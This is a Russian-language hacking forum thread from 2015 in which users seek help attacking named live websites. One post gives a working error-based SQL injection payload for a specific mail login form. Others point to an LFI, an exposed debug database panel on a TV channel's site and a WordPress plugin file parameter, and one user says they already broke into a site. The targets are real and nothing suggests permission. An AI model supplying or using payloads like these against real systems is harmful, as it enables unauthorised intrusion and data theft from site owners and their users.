ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
01.06.2015, 16:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
35200
Репутация:
6
|
|
Если поставить в куки например a=1, то отдает другую страницу.
Что сделать можно?
|
|
|
|
01.06.2015, 16:32
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от huntercs16
huntercs16 said:
↑
Если поставить в куки например a=1, то отдает другую страницу.
Что сделать можно? я же вам уже подсказывал в аналогичной ситуации. реферрер!
|
|
|
01.06.2015, 16:34
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от huntercs16
huntercs16 said:
↑
Если поставить в куки например a=1, то отдает другую страницу.
Что сделать можно? Посочувствовать вашему опыту... Ведь перед вами настоящая LFI
|
|
|
|
01.06.2015, 18:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
36068
Репутация:
0
|
|
Ребят, помогите раскрутить. post инъекция в поле id
Код:
Code:
http://mail.topicimages.com/groupware/login.php
data:
Код:
Code:
mode=login&hmail_domain=topicimages.com&usb=&mac=&hmail_id=d'&hmail_pass=9&ck1=&ck2=
|
|
|
|
01.06.2015, 18:08
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от vikler
vikler said:
↑
Ребят, помогите раскрутить. post инъекция в поле id
Код:
Code:
http://mail.topicimages.com/groupware/login.php
data:
Код:
Code:
mode=login&hmail_domain=topicimages.com&usb=&mac=&hmail_id=d'&hmail_pass=9&ck1=&ck2=
mode=login&hmail_domain=topicimages.com&usb=&mac=& hmail_id=d'and(extractvalue(1,concat(0x3a,version( ))))='1&hmail_pass=9&ck1=&ck2=
|
|
|
|
01.06.2015, 18:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от huntercs16
huntercs16 said:
↑
Если поставить в куки например a=1, то отдает другую страницу.
Что сделать можно? Тоже хочу что-нибудь заскринить
|
|
|
|
01.06.2015, 18:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
35200
Репутация:
6
|
|
Сообщение от YaBtr
YaBtr said:
↑
Тоже хочу что-нибудь заскринить
Да я уже залился туда, спасибо.
Плагин глючит, который куки ставит
|
|
|
|
01.06.2015, 19:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
5534
Репутация:
0
|
|
Всем доброго дня. ) Наткнулся на сайте канала Перец на такой вот запрос: http://peretz.ru/ frontend_dev.php который вывел меня на панель БД. Сам я по БД не спец, поэтому обращаюсь к вам с вопросом можно ли выудить что-нибудь вкусное отсюда? |
|
|
|
02.06.2015, 04:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Доброе утро! Подскажите пожалуйста, тут можно что-нибудь сделать?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//kenford.com.ua/wp-content/plugins/jquery-vertical-mega-menu/skin.php?skin=jj[/COLOR][/COLOR]
frank,дружище, ты как всегда на высоте |
|
|
|
02.06.2015, 10:31
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от BabaDook
BabaDook said:
↑
Доброе утро! Подскажите пожалуйста, тут можно что-нибудь сделать?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//kenford.com.ua/wp-content/plugins/jquery-vertical-mega-menu/skin.php?skin=jj[/COLOR][/COLOR]
frank,дружище, ты как всегда на высотедля начала идем на сайт вордпресса скачиваем исходники: https://wordpress.org/plugins/jquery...cal-mega-menu/
открываем skin.php и видим на 31 строке:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
т. е. за пределы директории выйти не получится. без этого бы могла быть читалка файлов
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
